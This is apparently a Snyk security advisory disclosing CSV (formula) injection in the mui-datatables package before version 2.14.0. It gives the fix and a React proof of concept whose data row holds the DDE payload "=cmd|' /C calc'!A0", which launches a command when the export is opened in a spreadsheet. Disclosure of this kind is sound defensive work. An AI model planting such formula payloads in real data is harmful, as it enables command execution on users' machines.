CSV Injection Affecting mui-datatables package, versions <2.14.0
Snyk CVSS
Attack Complexity
Low
User Interaction
Required
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-MUIDATATABLES-174185
- published 14 Apr 2019
- disclosed 29 Mar 2019
- credit gregnb
How to fix?
Upgrade mui-datatables
to version 2.14.0 or higher.
Overview
mui-datatables is a data tables component built on Material-UI.
Affected versions of this package are vulnerable to CSV Injection. CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:
- Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software.
- Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website
- Exfiltrating contents from the spreadsheet, or other open spreadsheets.
Proof Of Concept (PoC)
import React from "react";
import ReactDOM from "react-dom";
import MUIDataTable from "mui-datatables";
class App extends React.Component {
render() {
const columns = ["Name", "Title", "Location", "Age", "Salary"];
const data = [
["=cmd|' /C calc'!A0", "Business Analyst", "Minneapolis", 30, "$100,000"],
["Aiden Lloyd", "Business Consultant", "Dallas", 55, "$200,000"],
["Jaden Collins", "Attorney", "Santa Ana", 27, "$500,000"]
];
const options = {
filterType: "dropdown",
responsive: "scroll"
};
return (
<MUIDataTable
title={"ACME Employee list"}
data={data}
columns={columns}
options={options}
/>
);
}
}
ReactDOM.render(<App />, document.getElementById("root"));